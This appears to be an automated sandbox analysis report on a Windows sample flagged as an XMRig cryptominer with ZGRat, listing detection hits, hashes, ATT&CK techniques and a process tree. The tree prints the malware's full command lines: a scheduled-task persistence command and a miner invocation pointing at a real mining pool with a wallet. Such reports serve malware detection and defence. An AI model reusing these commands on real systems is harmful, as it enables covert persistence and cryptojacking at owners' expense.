xmrig | 0ec4dc59bfa704ff0777038d4c747fb42db308bed43f2ad6a681b645d1bfecbd

Analysis

max time kernel
1102s
max time network
1197s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
26-01-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Size

5.6MB
MD5

1a27bd843a09f923661a15300e02d703
SHA1

5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA256

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512

330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
SSDEEP

49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score

10^/10

xmrig zgrat miner rat upx

Malware Config

Signatures

Detect ZGRat V1 7 IoCs

Processes:

resource	yara_rule
behavioral10/memory/896-0-0x0000000000360000-0x0000000000900000-memory.dmp	family_zgrat_v1
behavioral10/files/0x000300000002a7d6-13.dat	family_zgrat_v1
behavioral10/files/0x000300000002a7d6-12.dat	family_zgrat_v1
behavioral10/files/0x000300000002a7d6-42.dat	family_zgrat_v1
behavioral10/files/0x000300000002a7d6-70.dat	family_zgrat_v1
behavioral10/files/0x000300000002a7d6-110.dat	family_zgrat_v1
behavioral10/files/0x000300000002a7d6-131.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 44 IoCs

miner

Processes:

resource	yara_rule
behavioral10/memory/3168-22-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-23-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-25-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-26-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-28-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-30-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-33-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-34-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/3168-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-54-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-56-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-58-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-57-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-55-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-59-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-60-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-61-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-62-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-63-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/224-64-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/244-85-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/244-87-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/244-88-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/244-89-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/244-86-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/244-94-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/244-95-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2092-103-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2092-104-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2092-105-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2092-106-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2092-107-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2092-108-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2092-109-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/1124-123-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/1124-124-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/1124-125-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/1124-126-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral10/memory/2208-149-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 7 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral10/memory/896-0-0x0000000000360000-0x0000000000900000-memory.dmp	net_reactor
behavioral10/files/0x000300000002a7d6-13.dat	net_reactor
behavioral10/files/0x000300000002a7d6-12.dat	net_reactor
behavioral10/files/0x000300000002a7d6-42.dat	net_reactor
behavioral10/files/0x000300000002a7d6-70.dat	net_reactor
behavioral10/files/0x000300000002a7d6-110.dat	net_reactor
behavioral10/files/0x000300000002a7d6-131.dat	net_reactor

Executes dropped EXE 6 IoCs

Processes:

.exe.exe.exe.exe.exe.exe

pid	Process
3924	.exe
4556	.exe
2304	.exe
3748	.exe
488	.exe
4048	.exe

UPX packed file 52 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral10/memory/3168-17-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-18-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-20-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-22-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-23-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-33-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/3168-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-50-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-54-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-56-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-58-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-57-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-55-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-59-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-60-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-61-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-62-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-63-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/224-64-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-79-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-85-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-87-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-88-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-89-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-86-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-94-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/244-95-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-99-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-103-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-104-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-105-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-106-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-107-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-108-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2092-109-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/1124-119-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/1124-123-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/1124-124-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/1124-125-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/1124-126-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2208-140-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral10/memory/2208-149-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 5 IoCs

Processes:

.exe.exe.exe.exe.exe

description	pid	Process	procid_target
PID 3924 set thread context of 3168	3924	.exe	84
PID 4556 set thread context of 224	4556	.exe	91
PID 2304 set thread context of 244	2304	.exe	97
PID 3748 set thread context of 2092	3748	.exe	103
PID 488 set thread context of 1124	488	.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
2616	schtasks.exe
3356	schtasks.exe
4636	schtasks.exe
5048	schtasks.exe
3264	schtasks.exe
3456	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
1976	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

.exe.exe.exe.exe.exe.exe

pid	Process
3924	.exe
4556	.exe
2304	.exe
3748	.exe
488	.exe
4048	.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exe

description	pid	Process
Token: SeDebugPrivilege	896	PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Token: SeDebugPrivilege	3924	.exe
Token: SeLockMemoryPrivilege	3168	vbc.exe
Token: SeLockMemoryPrivilege	3168	vbc.exe
Token: SeDebugPrivilege	4556	.exe
Token: SeLockMemoryPrivilege	224	vbc.exe
Token: SeLockMemoryPrivilege	224	vbc.exe
Token: SeDebugPrivilege	2304	.exe
Token: SeLockMemoryPrivilege	244	vbc.exe
Token: SeLockMemoryPrivilege	244	vbc.exe
Token: SeDebugPrivilege	3748	.exe
Token: SeLockMemoryPrivilege	2092	vbc.exe
Token: SeLockMemoryPrivilege	2092	vbc.exe
Token: SeDebugPrivilege	488	.exe
Token: SeLockMemoryPrivilege	1124	vbc.exe
Token: SeLockMemoryPrivilege	1124	vbc.exe
Token: SeDebugPrivilege	4048	.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

vbc.exevbc.exevbc.exevbc.exevbc.exe

pid	Process
3168	vbc.exe
224	vbc.exe
244	vbc.exe
2092	vbc.exe
1124	vbc.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

PV0HLG9QQ3YXXG1AJAMYRYE08NU.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.exe

description	pid	Process	procid_target
PID 896 wrote to memory of 4044	896	PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe	76
PID 896 wrote to memory of 4044	896	PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe	76
PID 4044 wrote to memory of 1976	4044	cmd.exe	78
PID 4044 wrote to memory of 1976	4044	cmd.exe	78
PID 4044 wrote to memory of 3924	4044	cmd.exe	79
PID 4044 wrote to memory of 3924	4044	cmd.exe	79
PID 3924 wrote to memory of 3172	3924	.exe	81
PID 3924 wrote to memory of 3172	3924	.exe	81
PID 3172 wrote to memory of 2616	3172	cmd.exe	82
PID 3172 wrote to memory of 2616	3172	cmd.exe	82
PID 3924 wrote to memory of 3168	3924	.exe	84
PID 3924 wrote to memory of 3168	3924	.exe	84
PID 3924 wrote to memory of 3168	3924	.exe	84
PID 3924 wrote to memory of 3168	3924	.exe	84
PID 3924 wrote to memory of 3168	3924	.exe	84
PID 3924 wrote to memory of 3168	3924	.exe	84
PID 3924 wrote to memory of 3168	3924	.exe	84
PID 4556 wrote to memory of 3872	4556	.exe	87
PID 4556 wrote to memory of 3872	4556	.exe	87
PID 3872 wrote to memory of 3356	3872	cmd.exe	90
PID 3872 wrote to memory of 3356	3872	cmd.exe	90
PID 4556 wrote to memory of 224	4556	.exe	91
PID 4556 wrote to memory of 224	4556	.exe	91
PID 4556 wrote to memory of 224	4556	.exe	91
PID 4556 wrote to memory of 224	4556	.exe	91
PID 4556 wrote to memory of 224	4556	.exe	91
PID 4556 wrote to memory of 224	4556	.exe	91
PID 4556 wrote to memory of 224	4556	.exe	91
PID 2304 wrote to memory of 236	2304	.exe	93
PID 2304 wrote to memory of 236	2304	.exe	93
PID 236 wrote to memory of 4636	236	cmd.exe	96
PID 236 wrote to memory of 4636	236	cmd.exe	96
PID 2304 wrote to memory of 244	2304	.exe	97
PID 2304 wrote to memory of 244	2304	.exe	97
PID 2304 wrote to memory of 244	2304	.exe	97
PID 2304 wrote to memory of 244	2304	.exe	97
PID 2304 wrote to memory of 244	2304	.exe	97
PID 2304 wrote to memory of 244	2304	.exe	97
PID 2304 wrote to memory of 244	2304	.exe	97
PID 3748 wrote to memory of 2936	3748	.exe	99
PID 3748 wrote to memory of 2936	3748	.exe	99
PID 2936 wrote to memory of 5048	2936	cmd.exe	102
PID 2936 wrote to memory of 5048	2936	cmd.exe	102
PID 3748 wrote to memory of 2092	3748	.exe	103
PID 3748 wrote to memory of 2092	3748	.exe	103
PID 3748 wrote to memory of 2092	3748	.exe	103
PID 3748 wrote to memory of 2092	3748	.exe	103
PID 3748 wrote to memory of 2092	3748	.exe	103
PID 3748 wrote to memory of 2092	3748	.exe	103
PID 3748 wrote to memory of 2092	3748	.exe	103
PID 488 wrote to memory of 1068	488	.exe	105
PID 488 wrote to memory of 1068	488	.exe	105
PID 1068 wrote to memory of 3264	1068	cmd.exe	108
PID 1068 wrote to memory of 3264	1068	cmd.exe	108
PID 488 wrote to memory of 1124	488	.exe	109
PID 488 wrote to memory of 1124	488	.exe	109
PID 488 wrote to memory of 1124	488	.exe	109
PID 488 wrote to memory of 1124	488	.exe	109
PID 488 wrote to memory of 1124	488	.exe	109
PID 488 wrote to memory of 1124	488	.exe	109
PID 488 wrote to memory of 1124	488	.exe	109
PID 4048 wrote to memory of 2268	4048	.exe	111
PID 4048 wrote to memory of 2268	4048	.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
"C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7CB2.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1976
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3924
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3172
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2616
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:3168

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3872
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3356
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:224

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:236
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4636
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:244

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:5048
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2092

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3264
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1124

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  PID:2268
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3456
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  PID:2208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
3.5MB

MD5
eb0ce8e0b2548e9966bfe91d13204e6a

SHA1
2398c2f7c5d3a386e73935f309dbee12defa4b6d

SHA256
de61d4031c710cbab686dc9f4ce307a57e9e790a693f46867384a497f9112f92

SHA512
ccd8c8378d12b725ac13e53a472600f96feb7daba77284cc84157cb3190ff061b916158a42bfd4686bf4b8a548d343a80724adfd782b2db54cb4514f551baa14

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
2.4MB

MD5
2ec0c076ab076067f2f4b5e3596ce915

SHA1
016ae83f53ba39ae50844bd07ab6d1db06afd5e3

SHA256
fefcd4704238318982e29aca0d3fbcd911c1a0223d3d8e18f7eb00529f7d98c7

SHA512
5187b8efe39ca452ec46555abe17653afd01d4710c7a50935e63d25dbeffe1c06a3a2fa2797a5b598b960bd2d6e01dcfb73c8c5f78d6de13dbab1661e9bf017c

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
2.2MB

MD5
11ffd36f02d156a613ad7d34b0d74368

SHA1
0d6aad7e5d5d46769fb0defcf94e672c0d018903

SHA256
23e351042b3b5c789617b4e0c6cf7d36caf3655cce2d8f86193db592f7d2893e

SHA512
bff0aaaa5e7e07eddfaae0e7102dc9a8341dce60e3bc6d583dd85e3201ec1f2fc41297396f6103952001eb179877bb24b6e506015ceefbb43392f81778499edd

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
10KB

MD5
d7e25d19428407d922b5fe01468f5959

SHA1
f8944548112f55629214e71536d594c24aa38ce7

SHA256
9fa908716fed018a0f2ca3bcf2de9ef06c23e0437d1650bc2502f948e21bf5c8

SHA512
8692a66473518bdd1c9dab899ced7c51628d674879b80dd31e47f46dfb997be6c2d9801ba4eb8a8a3eea37d2b56e1aec7d7761208c54264c82918e3826184a9f

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
66KB

MD5
4368050e983bf8c9086eb5434446a143

SHA1
8a5ff584529893efb52ca5e62bb9df646b827e4a

SHA256
20bb8d553b3d4a56f5d5c97eb40647189fb87db2b9c5343f5ab253bb919e3462

SHA512
451f996dea7f0dddac2340ceafaee471547e9a33af60cbb4f8c0c5cbe62a8915a625a932fce899902d8b1362887b761edc282b6721525ab84e0f02f4a3dcd31e

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.6MB

MD5
1a27bd843a09f923661a15300e02d703

SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log

Filesize
1KB

MD5
